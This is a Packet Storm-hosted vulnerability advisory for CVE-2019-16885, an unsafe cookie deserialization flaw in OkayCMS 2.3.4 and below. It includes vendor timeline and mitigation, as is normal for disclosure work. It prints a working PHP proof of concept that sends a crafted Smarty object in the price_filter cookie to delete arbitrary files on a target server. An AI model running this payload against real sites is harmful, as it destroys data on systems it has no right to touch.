what you don't know can hurt you

OkayCMS 2.3.4 Remote Code Execution

OkayCMS 2.3.4 Remote Code Execution
Posted Dec 6, 2019
Authored by Wolfgang Hotwagner

OkayCMS versions 2.3.4 and below suffer from remote code execution vulnerability.

tags | exploit, remote, code execution
advisories | CVE-2019-16885
MD5 | ac48925812fe6df9cf4011ec5409f36d

OkayCMS 2.3.4 Remote Code Execution

Change Mirror Download
# Unauthenticated remote code execution in OkayCMS

## Overview
* Identifier: AIT-SA-20191129-01
* Target: OkayCMS
* Vendor: OkayCMS
* Version: all versions including 2.3.4
* CVE: CVE-2019-16885
* Accessibility: Local
* Severity: Critical
* Author: Wolfgang Hotwagner (AIT Austrian Institute of Technology)

## Summary
[OkayCMS is a simple and functional content managment system for an online store.](https://okay-cms.com)

## Vulnerability Description
An unauthenticated attacker can upload a webshell by injecting a malicious php-object via a crafted cookie. This could happen at two places. First in "view/ProductsView.php" using the cookie "price_filter" or in "api/Comparison.php" via the cookie "comparison". Both cookies will pass untrusted values to a unserialize()-function. The following code shows the vulnerability in "api/Comparison.php":

```
$items = !empty($_COOKIE['comparison']) ? unserialize($_COOKIE['comparison']) : array();
```

The unsafe deserialization also occurs in "view/ProductsView.php":

```
$price_filter = unserialize($_COOKIE['price_filter']);
```


## Proof of Concept
The following code utilizes an object of the smarty-component to delete arbitrary files from the webhost:

```
<?php

if($argc != 3)
{
print "usage: $argv[0] <url> <file>\n";
exit(1);
}

$url = $argv[1];
$file = $argv[2];

class Smarty_Internal_CacheResource_File {

public function releaseLock(Smarty $smarty, Smarty_Template_Cached $cached) {
$cached->is_locked = false;
@unlink($cached->lock_id);
}
}

class Smarty_Template_Cached {
public $handler = null;
public $is_locked = true;
public $lock_id = "";

public function __construct() {
$this->lock_id = $GLOBALS['file'];
$this->handler = new Smarty_Internal_CacheResource_File;
}
}


class Smarty {
public $cache_locking = true;
}

class Smarty_Internal_Template {
public $smarty = null;
public $cached = null;

public function __construct() {
$this->smarty = new Smarty;
$this->cached = new Smarty_Template_Cached;
}

public function __destruct(){
if ($this->smarty->cache_locking && isset($this->cached) && $this->cached->is_locked) {
$this->cached->handler->releaseLock($this->smarty, $this->cached);
}
}
}

$obj = new Smarty_Internal_Template();

$serialized = serialize($obj);

$un = unserialize($serialized);

$headers = [
'Accept-Language: en-US,en;q=0.5',
"Referer: $url/en/catalog/myagkie-igrushki",
'Cookie: ' . 'price_filter=' . urlencode($serialized) . ';'
];

$curl = curl_init();
curl_setopt_array($curl, [
CURLOPT_HTTPHEADER => $headers,
CURLOPT_RETURNTRANSFER => true,
CURLOPT_URL => "$url/en/catalog/myagkie-igrushki/sort-price",
CURLOPT_USERAGENT => 'Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0'
]);
$resp = curl_exec($curl);
if(curl_error($curl)) {
print curl_error($curl);
}
curl_close($curl);


print $resp;

?>
```

## Notes
Because of the high severity of this vulnerability we will not release a full exploit for the remote code execution.

## Vulnerable Versions
versions of the “Lite”-branch including 2.3.4. Pro Versions prior 3.0.2 might have been affected too.

## Tested Versions
OkayCMS-Lite 2.3.4

## Impact
An unauthenticated attacker could upload a webshell to the server and execute commands remotely.

## Mitigation
At the moment of this publication the vendor has only patched the paid version of the CMS, so a change to other free software or an upgrade to the Pro version of OkayCMS is recommended.

## References:
* https://nvd.nist.gov/vuln/detail/CVE-2019-16885

## Vendor Contact Timeline

* `2019-08-29` Contacting the vendor
* `2019-09-04` Vendor replied
* `2019-09-17` Vendor released commercial version 3.0.2 including a bugfix
* `2019-09-29` Public disclosure

## Advisory URL
[https://www.ait.ac.at/ait-sa-20191129-01-unauthenticated-remote-code-execution-okaycms](https://www.ait.ac.at/ait-sa-20191129-01-unauthenticated-remote-code-execution-okaycms)



Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

February 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    1 Files
  • 2
    Feb 2nd
    2 Files
  • 3
    Feb 3rd
    17 Files
  • 4
    Feb 4th
    15 Files
  • 5
    Feb 5th
    24 Files
  • 6
    Feb 6th
    16 Files
  • 7
    Feb 7th
    19 Files
  • 8
    Feb 8th
    1 Files
  • 9
    Feb 9th
    2 Files
  • 10
    Feb 10th
    15 Files
  • 11
    Feb 11th
    20 Files
  • 12
    Feb 12th
    12 Files
  • 13
    Feb 13th
    18 Files
  • 14
    Feb 14th
    17 Files
  • 15
    Feb 15th
    4 Files
  • 16
    Feb 16th
    4 Files
  • 17
    Feb 17th
    34 Files
  • 18
    Feb 18th
    15 Files
  • 19
    Feb 19th
    19 Files
  • 20
    Feb 20th
    20 Files
  • 21
    Feb 21st
    11 Files
  • 22
    Feb 22nd
    0 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    0 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files
  • 29
    Feb 29th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close